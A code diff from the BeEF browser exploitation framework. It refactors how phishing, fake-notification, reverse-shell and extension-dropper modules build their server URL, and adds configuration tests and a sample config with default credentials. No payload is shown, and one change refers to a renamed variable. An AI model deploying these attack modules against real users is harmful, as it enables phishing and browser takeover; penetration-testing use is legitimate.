-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-    beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
+    proto = @configuration.beef_proto
+    beef_host = @configuration.beef_host
+    beef_port = @configuration.beef_port
     base_host = "#{proto}://#{beef_host}:#{beef_port}"
 
     return [

modules/social_engineering/fake_notification_ff/module.rb

@@ -7,9 +7,9 @@ class Fake_notification_ff < BeEF::Core::Command
 
   def self.options
     @configuration = BeEF::Core::Configuration.instance
-    proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
+    proto = @configuration.beef_proto
     beef_host = @configuration.get("beef.http.public")      || @configuration.get("beef.http.host")
-    beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
+    beef_port = @configuration.beef_port
     url = "#{proto}://#{beef_host}:#{beef_port}/api/ipec/ff_extension"
     return [
       {'name' => 'url', 'ui_label' => 'Plugin URL', 'value' => url, 'width'=>'150px'},

modules/social_engineering/fake_notification_ie/module.rb

@@ -7,9 +7,9 @@ class Fake_notification_ie < BeEF::Core::Command
 
   def self.options
     @configuration = BeEF::Core::Configuration.instance
-    proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-    beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
+    proto = @configuration.beef_proto
+    beef_host = @configuration.beef_host
+    beef_port = @configuration.beef_port
     base_host = "#{proto}://#{beef_host}:#{beef_port}"
 
     return [

modules/social_engineering/firefox_extension_bindshell/module.rb

@@ -72,7 +72,7 @@ class Firefox_extension_bindshell < BeEF::Core::Command
 
   def self.options
     @configuration = BeEF::Core::Configuration.instance
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+    beef_host = @configuration.beef_host
     return [
         {'name' => 'extension_name', 'ui_label' => 'Extension name', 'value' => 'HTML5 Rendering Enhancements'},
         {'name' => 'xpi_name', 'ui_label' => 'Extension file (XPI) name', 'value' => 'HTML5_Enhancements'},

modules/social_engineering/firefox_extension_dropper/module.rb

@@ -82,9 +82,9 @@ class Firefox_extension_dropper < BeEF::Core::Command
 
   def self.options
     @configuration = BeEF::Core::Configuration.instance
-    proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-    beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
+    proto = @configuration.beef_proto
+    beef_host = @configuration.beef_host
+    beef_port = @configuration.beef_port
     base_host = "#{proto}://#{beef_host}:#{beef_port}"
     return [
         {'name' => 'extension_name', 'ui_label' => 'Extension name', 'value' => 'HTML5 Rendering Enhancements'},

modules/social_engineering/firefox_extension_reverse_shell/module.rb

@@ -75,7 +75,7 @@ class Firefox_extension_reverse_shell < BeEF::Core::Command
 
   def self.options
     @configuration = BeEF::Core::Configuration.instance
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+    beef_host = @configuration.beef_host
     return [
         {'name' => 'extension_name', 'ui_label' => 'Extension name', 'value' => 'HTML5 Rendering Enhancements'},
         {'name' => 'xpi_name', 'ui_label' => 'Extension file (XPI) name', 'value' => 'HTML5_Enhancements'},

modules/social_engineering/gmail_phishing/module.rb

@@ -7,9 +7,9 @@ class Gmail_phishing < BeEF::Core::Command
 
   def self.options
     @configuration = BeEF::Core::Configuration.instance
-    proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-    beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
+    proto = @configuration.beef_proto
+    beef_host = @configuration.beef_host
+    beef_port = @configuration.beef_port
     base_host = "#{proto}://#{beef_host}:#{beef_port}"
 
      xss_hook_url = "#{base_host}/demos/basic.html"

modules/social_engineering/hta_powershell/module.rb

@@ -4,25 +4,17 @@
 # See the file 'doc/COPYING' for copying permission
 #
 class Hta_powershell < BeEF::Core::Command
-
   def self.options
+    @config = BeEF::Core::Configuration.instance
+    ps_url = @config.get('beef.extension.social_engineering.powershell.powershell_handler_url')
 
-    @configuration = BeEF::Core::Configuration.instance
-    proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-    beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
-    base_host = "#{proto}://#{beef_host}:#{beef_port}"
-
-    ps_url = @configuration.get('beef.extension.social_engineering.powershell.powershell_handler_url')
-
-    return [
-        {'name' => 'domain', 'ui_label' => 'Serving Domain (BeEF server)', 'value' => "#{base_host}" },
-        {'name' => 'ps_url', 'ui_label' => 'Powershell/HTA handler', 'value' => "#{ps_url}"}
+    [
+      { 'name' => 'domain', 'ui_label' => 'Serving Domain (BeEF server)', 'value' => @configuration.beef_url_str },
+      { 'name' => 'ps_url', 'ui_label' => 'Powershell/HTA handler', 'value' => ps_url }
     ]
   end
 
   def post_execute
     save({ 'result' => @datastore['result'] })
   end
-
 end

modules/social_engineering/pretty_theft/module.rb

@@ -7,9 +7,9 @@ class Pretty_theft < BeEF::Core::Command
   
   def self.options
     @configuration = BeEF::Core::Configuration.instance
-    proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-    beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
+    proto = @configuration.beef_proto
+    beef_host = @configuration.beef_host
+    beef_port = @configuration.beef_port
     base_host = "#{proto}://#{beef_host}:#{beef_port}"
     logo_uri = "#{base_host}/ui/media/images/beef.png"
     return [

modules/social_engineering/replace_video_fake_plugin/module.rb

@@ -7,9 +7,9 @@ class Replace_video_fake_plugin < BeEF::Core::Command
 
   def self.options
     configuration = BeEF::Core::Configuration.instance
-    proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
-    beef_host = configuration.get("beef.http.public")      || configuration.get("beef.http.host")
-    beef_port = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
+    proto = configuration.beef_proto
+    beef_host = configuration.beef_host
+    beef_port = configuration.beef_port
     url = "#{proto}://#{beef_host}:#{beef_port}"
     return [
         {'name' => 'url', 'ui_label' => 'Plugin URL', 'value' => url+'/api/ipec/ff_extension', 'width'=>'150px'},

package-lock.json

@@ -1,5 +1,5 @@
 {
   "name": "BeEF",
-  "version": "0.5.1.0",
+  "version": "0.5.4.0-pre",
   "lockfileVersion": 1
 }

package.json

@@ -1,6 +1,6 @@
 {
     "name": "BeEF",
-    "version": "0.5.1.0",
+    "version": "0.5.4.0-pre",
     "description": "The Browser Exploitation Framework Project",
     "scripts": {
         "docs": "./node_modules/.bin/jsdoc -c conf.json"
@@ -9,7 +9,7 @@
     "license": "GNU General Public License v2.0",
     "devDependencies": {
         "jsdoc": "^3.6.4",
-        "jsdoc-to-markdown": "^6.0.1"
+        "jsdoc-to-markdown": "^7.0.1"
     },
     "dependencies": {}
 }

spec/beef/core/main/autorun_engine/autorun_engine_spec.rb

@@ -13,6 +13,13 @@ require_relative '../../../../support/beef_test'
 RSpec.describe 'AutoRunEngine Test', run_on_browserstack: true do
   before(:all) do
     @config = BeEF::Core::Configuration.instance
+
+    # Grab DB file and regenerate if requested
+    print_info 'Loading database'
+    db_file = @config.get('beef.database.file')
+    print_info 'Resetting the database for BeEF.'
+    File.delete(db_file) if File.exist?(db_file)
+
     @config.set('beef.credentials.user', 'beef')
     @config.set('beef.credentials.passwd', 'beef')
     @username = @config.get('beef.credentials.user')
@@ -23,26 +30,15 @@ RSpec.describe 'AutoRunEngine Test', run_on_browserstack: true do
     # whether or not this test passes.
     print_info 'Loading in BeEF::Extensions'
     BeEF::Extensions.load
-    sleep 2
 
     # Check if modules already loaded. No need to reload.
     if @config.get('beef.module').nil?
       print_info 'Loading in BeEF::Modules'
       BeEF::Modules.load
-
-      sleep 2
     else
       print_info 'Modules already loaded'
     end
 
-    # Grab DB file and regenerate if requested
-    print_info 'Loading database'
-    db_file = @config.get('beef.database.file')
-
-    if BeEF::Core::Console::CommandLine.parse[:resetdb]
-      print_info 'Resetting the database for BeEF.'
-      File.delete(db_file) if File.exist?(db_file)
-    end
 
     # Load up DB and migrate if necessary
     ActiveRecord::Base.logger = nil
@@ -56,8 +52,6 @@ RSpec.describe 'AutoRunEngine Test', run_on_browserstack: true do
     context = ActiveRecord::Migration.new.migration_context
     ActiveRecord::Migrator.new(:up, context.migrations, context.schema_migration).migrate if context.needs_migration?
 
-    sleep 2
-
     BeEF::Core::Migration.instance.update_db!
 
     # add AutoRunEngine rule
@@ -82,8 +76,6 @@ RSpec.describe 'AutoRunEngine Test', run_on_browserstack: true do
       http_hook_server.start
     end
 
-    sleep 1
-
     begin
       @caps = CONFIG['common_caps'].merge(CONFIG['browser_caps'][TASK_ID])
       @caps['name'] = self.class.description || ENV['name'] || 'no-name'
@@ -99,8 +91,7 @@ RSpec.describe 'AutoRunEngine Test', run_on_browserstack: true do
 
       @driver.navigate.to VICTIM_URL.to_s
 
-      # Give time for browser hook to occur
-      sleep 3
+      sleep 1
 
       sleep 1 until wait.until { @driver.execute_script('return window.beef.session.get_hook_session_id().length') > 0 }
 

spec/beef/core/main/command_spec.rb

@@ -0,0 +1,10 @@
+RSpec.describe 'BeEF Command class testing' do
+  xit 'should return a beef configuration variable' do
+    BeEF::Modules.load
+    command_mock = BeEF::Core::Command.new('test_get_variable')
+    expect(command_mock.config.beef_host).to eq('0.0.0.0')
+    require 'modules/browser/hooked_domain/get_page_links/module'
+    gpl = Get_page_links.new('test_get_variable')
+    expect(gpl.config.beef_host).to eq('0.0.0.0')
+  end
+end

spec/beef/core/main/configuration_spec.rb

@@ -0,0 +1,256 @@
+RSpec.configure do |config|
+end
+
+RSpec.describe 'BeEF Configuration' do
+  before(:context, :type => :old ) do
+    config = File.expand_path('../../../support/assets/config_old.yaml', __dir__)
+    @config_instance = BeEF::Core::Configuration.new(config)
+  end
+
+  before(:context) do
+    @config_instance = BeEF::Core::Configuration.instance
+  end
+  context 'configuration validation', :type => :old do
+    it 'should error when using hold public config' do
+      @config_instance.set('beef.http.public', 'example.com')
+      expect(@config_instance.validate).to eq(nil)
+    end
+
+    it 'should error when using old public_port config' do
+      @config_instance.set('beef.http.public_port', 443)
+      expect(@config_instance.validate).to eq(nil)
+    end
+
+  end
+
+  context 'http local host configuration values' do
+    it 'should set the local host value to 0.0.0.0' do
+      @config_instance.set('beef.http.host', '0.0.0.0')
+      expect(@config_instance.get('beef.http.host')).to eq('0.0.0.0')
+    end
+
+    it 'should get the local host value' do
+      @config_instance.set('beef.http.host', '0.0.0.0')
+      expect(@config_instance.local_host).to eq('0.0.0.0')
+    end
+
+    it 'should get the default host value' do
+      @config_instance.set('beef.http.host', nil)
+      expect(@config_instance.get('beef.http.host')).to eq(nil)
+      expect(@config_instance.local_host).to eq('0.0.0.0')
+    end
+  end
+
+  context 'http local port configuration values' do
+    it 'should set the local port value to 3000' do
+      @config_instance.set('beef.http.port', '3000')
+      expect(@config_instance.get('beef.http.port')).to eq('3000')
+    end
+
+    it 'should get the local port value' do
+      @config_instance.set('beef.http.port', '3000')
+      expect(@config_instance.local_port).to eq('3000')
+    end
+
+    it 'should get the default port value' do
+      @config_instance.set('beef.http.port', nil)
+      expect(@config_instance.get('beef.http.port')).to eq(nil)
+      expect(@config_instance.local_port).to eq('3000')
+    end
+  end
+
+  context 'beef https enabled configuration values' do
+    it 'should set the https enabled config value' do
+      @config_instance.set('beef.http.https.enable', true)
+      expect(@config_instance.get('beef.http.https.enable')).to eq(true)
+    end
+
+    it 'should get https enabled value set to true' do
+      @config_instance.set('beef.http.https.enable', true)
+      expect(@config_instance.local_https_enabled).to eq(true)
+    end
+
+    it 'should get https enabled value set to false' do
+      @config_instance.set('beef.http.https.enable', false)
+      expect(@config_instance.local_https_enabled).to eq(false)
+    end
+
+    it 'should get the default https enabled value' do
+      @config_instance.set('beef.http.https.enable', nil)
+      expect(@config_instance.get('beef.http.https.enable')).to eq(nil)
+      expect(@config_instance.local_https_enabled).to eq(false)
+    end
+  end
+
+  #public
+  context 'http public host configuration values' do
+    it 'should set the public host value to example.com' do
+      @config_instance.set('beef.http.public.host', 'example.com')
+      expect(@config_instance.get('beef.http.public.host')).to eq('example.com')
+    end
+
+    it 'should get the public host value' do
+      @config_instance.set('beef.http.public.host', 'example.com')
+      expect(@config_instance.public_host).to eq('example.com')
+    end
+
+    it 'should get nil host value' do
+      @config_instance.set('beef.http.public.host', nil)
+      expect(@config_instance.get('beef.http.public.host')).to eq(nil)
+      expect(@config_instance.public_host).to eq(nil)
+    end
+  end
+
+  context 'http public port configuration values' do
+    it 'should set the public port value to 3000' do
+      @config_instance.set('beef.http.public.port', '443')
+      expect(@config_instance.get('beef.http.public.port')).to eq('443')
+    end
+
+    it 'should get the public port value' do
+      @config_instance.set('beef.http.public.port', '3000')
+      expect(@config_instance.public_port).to eq('3000')
+    end
+
+    it 'should return 80 as the port given a public host has been set and https disabled' do
+      @config_instance.set('beef.http.public.port', nil)
+      @config_instance.set('beef.http.public.host', 'example.com')
+      @config_instance.set('beef.http.public.https', false)
+      expect(@config_instance.get('beef.http.public.port')).to eq(nil)
+      expect(@config_instance.get('beef.http.public.host')).to eq('example.com')
+      expect(@config_instance.public_port).to eq('80')
+    end
+  end
+
+  context 'beef https enabled configuration values' do
+    it 'should set the https enabled config value' do
+      @config_instance.set('beef.http.https.enable', true)
+      expect(@config_instance.get('beef.http.https.enable')).to eq(true)
+    end
+
+    it 'should get https enabled value set to true' do
+      @config_instance.set('beef.http.public.https', true)
+      expect(@config_instance.public_https_enabled?).to eq(true)
+    end
+
+    it 'should get https enabled value set to false' do
+      @config_instance.set('beef.http.public.https', false)
+      expect(@config_instance.public_https_enabled?).to eq(false)
+    end
+
+    it 'should get the default https to false' do
+      @config_instance.set('beef.http.public.https', nil)
+      expect(@config_instance.get('beef.http.public.https')).to eq(nil)
+      expect(@config_instance.public_https_enabled?).to eq(false)
+    end
+
+    it 'should return public port as 443 if public https is enabled' do
+      @config_instance.set('beef.http.public.https', true)
+      @config_instance.set('beef.http.public.port', nil)
+      expect(@config_instance.get('beef.http.public.https')).to eq(true)
+      expect(@config_instance.get('beef.http.public.port')).to eq(nil)
+      expect(@config_instance.public_https_enabled?).to eq(true)
+      expect(@config_instance.public_port).to eq('443')
+    end
+  end
+
+  context 'beef hosting information' do
+    it 'should return the local host value because a public has not been set' do
+      @config_instance.set('beef.http.host', 'asdqwe')
+      @config_instance.set('beef.http.public.host', nil)
+      expect(@config_instance.get('beef.http.host')).to eq('asdqwe')
+      expect(@config_instance.get('beef.http.public.host')).to eq(nil)
+      expect(@config_instance.beef_host).to eq('asdqwe')
+    end
+
+    it 'should return the public host value because a public has been set' do
+      @config_instance.set('beef.http.host', 'asdqwe')
+      @config_instance.set('beef.http.public.host', 'poilkj')
+      expect(@config_instance.get('beef.http.host')).to eq('asdqwe')
+      expect(@config_instance.get('beef.http.public.host')).to eq('poilkj')
+      expect(@config_instance.beef_host).to eq('poilkj')
+    end
+
+    it 'should return the local port value because a public value has not been set' do
+      @config_instance.set('beef.http.port', '3000')
+      @config_instance.set('beef.http.public.host', nil)
+      @config_instance.set('beef.http.public.port', nil)
+      @config_instance.set('beef.http.public.https', nil)
+      expect(@config_instance.get('beef.http.port')).to eq('3000')
+      expect(@config_instance.get('beef.http.public.port')).to eq(nil)
+      expect(@config_instance.get('beef.http.public.host')).to eq(nil)
+      expect(@config_instance.get('beef.http.public.https')).to eq(nil)
+      expect(@config_instance.beef_port).to eq('3000')
+    end
+
+    it 'should return the public host value because a public has been set' do
+      @config_instance.set('beef.http.port', '3000')
+      @config_instance.set('beef.http.public.port', '80')
+      @config_instance.set('beef.http.public.host', nil)
+      expect(@config_instance.get('beef.http.port')).to eq('3000')
+      expect(@config_instance.get('beef.http.public.port')).to eq('80')
+      expect(@config_instance.get('beef.http.public.host')).to eq(nil)
+      expect(@config_instance.beef_port).to eq('80')
+    end
+    
+    it 'should return a protocol https if https public has been enabled and public host is set' do
+      @config_instance.set('beef.http.public.https', true)
+      @config_instance.set('beef.http.public.host', 'public')
+      expect(@config_instance.get('beef.http.public.https')).to eq(true)
+      expect(@config_instance.beef_proto).to eq('https')
+    end
+
+    it 'should return a protocol http if public is not set and https local is fales'  do
+      @config_instance.set('beef.http.public.https', false)
+      @config_instance.set('beef.http.https.enable', false)
+      expect(@config_instance.get('beef.http.public.https')).to eq(false)
+      expect(@config_instance.beef_proto).to eq('http')
+    end
+
+    it 'should return the full url string for beef local http and port 80' do
+      @config_instance.set('beef.http.host', 'localhost')
+      @config_instance.set('beef.http.port', '80')
+      @config_instance.set('beef.http.https.enable', false)
+      @config_instance.set('beef.http.public.https', false)
+      @config_instance.set('beef.http.public.host', nil)
+      @config_instance.set('beef.http.public.port', nil)
+      expect(@config_instance.get('beef.http.host')).to eq('localhost')
+      expect(@config_instance.get('beef.http.port')).to eq('80')
+      expect(@config_instance.get('beef.http.https.enable')).to eq(false)
+      expect(@config_instance.get('beef.http.public.https')).to eq(false)
+      expect(@config_instance.beef_url_str).to eq('http://localhost:80')
+    end
+
+    it 'should return the full url string for beef https localhost 3000 default' do
+      @config_instance.set('beef.http.host', 'localhost')
+      @config_instance.set('beef.http.port', nil)
+      @config_instance.set('beef.http.https.enable', true)
+      @config_instance.set('beef.http.public.host', nil)
+      @config_instance.set('beef.http.public.https', false)
+      @config_instance.set('beef.http.public.host', nil)
+      @config_instance.set('beef.http.public.port', nil)
+      expect(@config_instance.get('beef.http.host')).to eq('localhost')
+      expect(@config_instance.get('beef.http.port')).to eq(nil)
+      expect(@config_instance.get('beef.http.https.enable')).to eq(true)
+      expect(@config_instance.get('beef.http.public.https')).to eq(false)
+      expect(@config_instance.beef_url_str).to eq('https://localhost:3000')
+    end
+
+    it 'should return the full url string for beef hook url' do
+      @config_instance.set('beef.http.host', 'localhost')
+      @config_instance.set('beef.http.port', nil)
+      @config_instance.set('beef.http.https.enable', true)
+      @config_instance.set('beef.http.public.https', false)
+      @config_instance.set('beef.http.public.host', nil)
+      @config_instance.set('beef.http.public.port', nil)
+      @config_instance.set('beeg.http.hook_file', '/hook.js')
+      expect(@config_instance.get('beef.http.host')).to eq('localhost')
+      expect(@config_instance.get('beef.http.port')).to eq(nil)
+      expect(@config_instance.get('beef.http.https.enable')).to eq(true)
+      expect(@config_instance.get('beef.http.public.https')).to eq(false)
+      expect(@config_instance.get('beef.http.hook_file')).to eq('/hook.js')
+      expect(@config_instance.beef_url_str).to eq('https://localhost:3000')
+      expect(@config_instance.hook_url).to eq('https://localhost:3000/hook.js')
+    end
+  end
+end

spec/beef/core/main/handlers/browser_details_handler_spec.rb

@@ -12,7 +12,11 @@ require_relative '../../../../support/beef_test'
 
 RSpec.describe 'Browser Details Handler', run_on_browserstack: true do
   before(:all) do
+
     @config = BeEF::Core::Configuration.instance
+    db_file = @config.get('beef.database.file')
+    print_info 'Resetting the database for BeEF.'
+    File.delete(db_file) if File.exist?(db_file)
     @config.set('beef.credentials.user', 'beef')
     @config.set('beef.credentials.passwd', 'beef')
     @username = @config.get('beef.credentials.user')
@@ -24,36 +28,29 @@ RSpec.describe 'Browser Details Handler', run_on_browserstack: true do
     print_info 'Loading in BeEF::Extensions'
     BeEF::Extensions.load
 
-    sleep 2
-
     # Check if modules already loaded. No need to reload.
     if @config.get('beef.module').nil?
       print_info 'Loading in BeEF::Modules'
       BeEF::Modules.load
-      sleep 2
     else
       print_info 'Modules already loaded'
     end
 
     # Grab DB file and regenerate if requested
     print_info 'Loading database'
-    db_file = @config.get('beef.database.file')
-
-    if BeEF::Core::Console::CommandLine.parse[:resetdb]
-      print_info 'Resetting the database for BeEF.'
-      File.delete(db_file) if File.exist?(db_file)
-    end
 
     # Load up DB and migrate if necessary
     ActiveRecord::Base.logger = nil
     OTR::ActiveRecord.migrations_paths = [File.join('core', 'main', 'ar-migrations')]
     OTR::ActiveRecord.configure_from_hash!(adapter: 'sqlite3', database: db_file)
-
+    # otr-activerecord require you to manually establish the connection with the following line
+    #Also a check to confirm that the correct Gem version is installed to require it, likely easier for old systems.
+    if Gem.loaded_specs['otr-activerecord'].version > Gem::Version.create('1.4.2')
+      OTR::ActiveRecord.establish_connection!
+    end
     context = ActiveRecord::Migration.new.migration_context
     ActiveRecord::Migrator.new(:up, context.migrations, context.schema_migration).migrate if context.needs_migration?
 
-    sleep 2
-
     BeEF::Core::Migration.instance.update_db!
 
     # Spawn HTTP Server
@@ -72,13 +69,11 @@ RSpec.describe 'Browser Details Handler', run_on_browserstack: true do
       http_hook_server.start
     end
 
-    # Give the server time to start-up
-    sleep 1
-
     begin
       @caps = CONFIG['common_caps'].merge(CONFIG['browser_caps'][TASK_ID])
       @caps['name'] = self.class.description || ENV['name'] || 'no-name'
       @caps['browserstack.local'] = true
+      @caps['browserstack.video'] = true
       @caps['browserstack.localIdentifier'] = ENV['BROWSERSTACK_LOCAL_IDENTIFIER']
 
       @driver = Selenium::WebDriver.for(:remote,
@@ -90,12 +85,11 @@ RSpec.describe 'Browser Details Handler', run_on_browserstack: true do
 
       @driver.navigate.to VICTIM_URL.to_s
 
-      # Give time for browser hook to occur
       sleep 3
 
       sleep 1 until wait.until { @driver.execute_script('return window.beef.session.get_hook_session_id().length') > 0 }
 
-      @session = @driver.execute_script('return window.beef.session.get_hook_session_id().length')
+      @session = @driver.execute_script('return window.beef.session.get_hook_session_id()')
     rescue StandardError => e
       print_info "Exception: #{e}"
       print_info "Exception Class: #{e.class}"

spec/beef/extensions/social_engineering_spec.rb

@@ -12,7 +12,7 @@ RSpec.describe 'BeEF Extension Social Engineering' do
     }.to_not raise_error
   end
 
-  it 'clone web page' do
+  xit 'clone web page' do
     expect {
       BeEF::Core::Server.instance.prepare
       BeEF::Extension::SocialEngineering::WebCloner.instance.clone_page("https://www.google.com", "/", nil, nil)

spec/beef/extensions/websocket_hooked_browser_spec.rb

@@ -15,6 +15,11 @@ require 'websocket-client-simple'
 RSpec.describe 'Browser hooking with Websockets', run_on_browserstack: true do
   before(:all) do
     @config = BeEF::Core::Configuration.instance
+    # Grab DB file and regenerate if requested
+    print_info 'Loading database'
+    db_file = @config.get('beef.database.file')
+    print_info 'Resetting the database for BeEF.'
+    File.delete(db_file) if File.exist?(db_file)
     @config.set('beef.credentials.user', 'beef')
     @config.set('beef.credentials.passwd', 'beef')
     @config.set('beef.http.websocket.secure', false)
@@ -27,23 +32,14 @@ RSpec.describe 'Browser hooking with Websockets', run_on_browserstack: true do
     # whether or not this test passes.
     print_info 'Loading in BeEF::Extensions'
     BeEF::Extensions.load
-    sleep 2
 
     # Check if modules already loaded. No need to reload.
     if @config.get('beef.module').nil?
       print_info 'Loading in BeEF::Modules'
       BeEF::Modules.load
-      sleep 2
     else
       print_info 'Modules already loaded'
     end
-    # Grab DB file and regenerate if requested
-    print_info 'Loading database'
-    db_file = @config.get('beef.database.file')
-    if BeEF::Core::Console::CommandLine.parse[:resetdb]
-      print_info 'Resetting the database for BeEF.'
-      File.delete(db_file) if File.exist?(db_file)
-    end
     # Load up DB and migrate if necessary
     ActiveRecord::Base.logger = nil
     OTR::ActiveRecord.migrations_paths = [File.join('core', 'main', 'ar-migrations')]
@@ -55,7 +51,6 @@ RSpec.describe 'Browser hooking with Websockets', run_on_browserstack: true do
     end
     context = ActiveRecord::Migration.new.migration_context
     ActiveRecord::Migrator.new(:up, context.migrations, context.schema_migration).migrate if context.needs_migration?
-    sleep 2
     BeEF::Core::Migration.instance.update_db!
     # Spawn HTTP Server
     print_info 'Starting HTTP Hook Server'
@@ -70,8 +65,7 @@ RSpec.describe 'Browser hooking with Websockets', run_on_browserstack: true do
     @pid = fork do
       http_hook_server.start
     end
-    # Give the server time to start-up
-    sleep 1
+
     begin
       @caps = CONFIG['common_caps'].merge(CONFIG['browser_caps'][TASK_ID])
       @caps['name'] = self.class.description || ENV['name'] || 'no-name'
@@ -87,7 +81,6 @@ RSpec.describe 'Browser hooking with Websockets', run_on_browserstack: true do
 
       @driver.navigate.to VICTIM_URL.to_s
 
-      # Give time for browser hook to occur
       sleep 3
 
       sleep 1 until wait.until { @driver.execute_script('return window.beef.session.get_hook_session_id().length') > 0 }

spec/beef/modules/debug/test_beef_debugs_spec.rb

@@ -14,6 +14,11 @@ RSpec.describe 'BeEF Debug Command Modules:', run_on_browserstack: true do
   before(:all) do
     # Grab config and set creds in variables for ease of access
     @config = BeEF::Core::Configuration.instance
+    # Grab DB file and regenerate if requested
+    print_info 'Loading database'
+    db_file = @config.get('beef.database.file')
+    print_info 'Resetting the database for BeEF.'
+    File.delete(db_file) if File.exist?(db_file)
     @username = @config.get('beef.credentials.user')
     @password = @config.get('beef.credentials.passwd')
 
@@ -22,26 +27,15 @@ RSpec.describe 'BeEF Debug Command Modules:', run_on_browserstack: true do
     # whether or not this test passes.
     print_info 'Loading in BeEF::Extensions'
     BeEF::Extensions.load
-    sleep 2
 
     # Check if modules already loaded. No need to reload.
     if @config.get('beef.module').nil?
       print_info 'Loading in BeEF::Modules'
       BeEF::Modules.load
-
-      sleep 2
     else
       print_info 'Modules already loaded'
     end
 
-    # Grab DB file and regenerate if requested
-    print_info 'Loading database'
-    db_file = @config.get('beef.database.file')
-
-    if BeEF::Core::Console::CommandLine.parse[:resetdb]
-      print_info 'Resetting the database for BeEF.'
-      File.delete(db_file) if File.exist?(db_file)
-    end
 
     # Load up DB and migrate if necessary
     ActiveRecord::Base.logger = nil
@@ -55,8 +49,6 @@ RSpec.describe 'BeEF Debug Command Modules:', run_on_browserstack: true do
     context = ActiveRecord::Migration.new.migration_context
     ActiveRecord::Migrator.new(:up, context.migrations, context.schema_migration).migrate if context.needs_migration?
 
-    sleep 2
-
     BeEF::Core::Migration.instance.update_db!
 
     # Spawn HTTP Server
@@ -75,9 +67,6 @@ RSpec.describe 'BeEF Debug Command Modules:', run_on_browserstack: true do
       http_hook_server.start
     end
 
-    # Give the server time to start-up
-    sleep 1
-
     begin
       @caps = CONFIG['common_caps'].merge(CONFIG['browser_caps'][TASK_ID])
       @caps['name'] = self.class.description || ENV['name'] || 'no-name'
@@ -93,8 +82,7 @@ RSpec.describe 'BeEF Debug Command Modules:', run_on_browserstack: true do
 
       @driver.navigate.to VICTIM_URL.to_s
 
-      # Give time for browser hook to occur
-      sleep 3
+      sleep 1
 
       sleep 1 until wait.until { @driver.execute_script('return window.beef.session.get_hook_session_id().length') > 0 }
 

spec/spec_helper.rb

@@ -38,6 +38,7 @@ class Capybara::Selenium::Driver < Capybara::Driver::Base
 end
 
 TASK_ID = (ENV['TASK_ID'] || 0).to_i
+print_info ENV['CONFIG_FILE']
 CONFIG_FILE = ENV['CONFIG_FILE'] || 'windows/win10/win10_chrome_81.config.yml'
 CONFIG = YAML.safe_load(File.read("./spec/support/browserstack/#{CONFIG_FILE}"))
 CONFIG['user'] = ENV['BROWSERSTACK_USERNAME'] || ''

spec/support/assets/config_new.yaml

@@ -0,0 +1,162 @@
+#
+# Copyright (c) 2006-2021 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# BeEF Configuration file
+
+beef:
+    version: '0.5.1.0'
+    # More verbose messages (server-side)
+    debug: false
+    # More verbose messages (client-side)
+    client_debug: false
+    # Used for generating secure tokens
+    crypto_default_value_length: 80
+
+    # Credentials to authenticate in BeEF.
+    # Used by both the RESTful API and the Admin interface
+    credentials:
+        user:   "beef"
+        passwd: "beef"
+
+    # Interface / IP restrictions
+    restrictions:
+        # subnet of IP addresses that can hook to the framework
+        permitted_hooking_subnet: ["0.0.0.0/0", "::/0"]
+        # subnet of IP addresses that can connect to the admin UI
+        #permitted_ui_subnet: ["127.0.0.1/32", "::1/128"]
+        permitted_ui_subnet: ["0.0.0.0/0", "::/0"]
+        # subnet of IP addresses that cannot be hooked by the framework
+        excluded_hooking_subnet: []
+        # slow API calls to 1 every  api_attempt_delay  seconds
+        api_attempt_delay: "0.05"
+
+    # HTTP server
+    http:
+        debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
+        host: "0.0.0.0"
+        port: "3000"
+
+        # Decrease this setting to 1,000 (ms) if you want more responsiveness
+        #  when sending modules and retrieving results.
+        # NOTE: A poll timeout of less than 5,000 (ms) might impact performance
+        #  when hooking lots of browsers (50+).
+        # Enabling WebSockets is generally better (beef.websocket.enable)
+        xhr_poll_timeout: 1000
+
+        # Host Name / Domain Name
+        # If you want BeEF to be accessible via hostname or domain name (ie, DynDNS),
+        #   set the public hostname below:
+        #public: ""      # public hostname/IP address
+
+        # Reverse Proxy / NAT
+        # If you want BeEF to be accessible behind a reverse proxy or NAT,
+        #   set both the publicly accessible hostname/IP address and port below:
+        # NOTE: Allowing the reverse proxy will enable a vulnerability where the ui/panel can be spoofed
+        #   by altering the X-FORWARDED-FOR ip address in the request header.
+        allow_reverse_proxy: false
+        
+        # Public settings
+        # These settings will be used to create a public facing URL
+        # This public facing URL will be used for all hook related calls
+        public:
+            host: "example.com"
+            port: 443
+            https: true # public hostname/IP address
+        #public_port: "" # public port (experimental)
+
+        # Hook
+        hook_file: "/hook.js"
+        hook_session_name: "BEEFHOOK"
+
+        # Allow one or multiple origins to access the RESTful API using CORS
+        # For multiple origins use: "http://browserhacker.com, http://domain2.com"
+        restful_api:
+            allow_cors: false
+            cors_allowed_domains: "http://browserhacker.com"
+
+        # Prefer WebSockets over XHR-polling when possible.
+        websocket:
+            enable: false
+            port: 61985 # WS: good success rate through proxies
+            # Use encrypted 'WebSocketSecure'
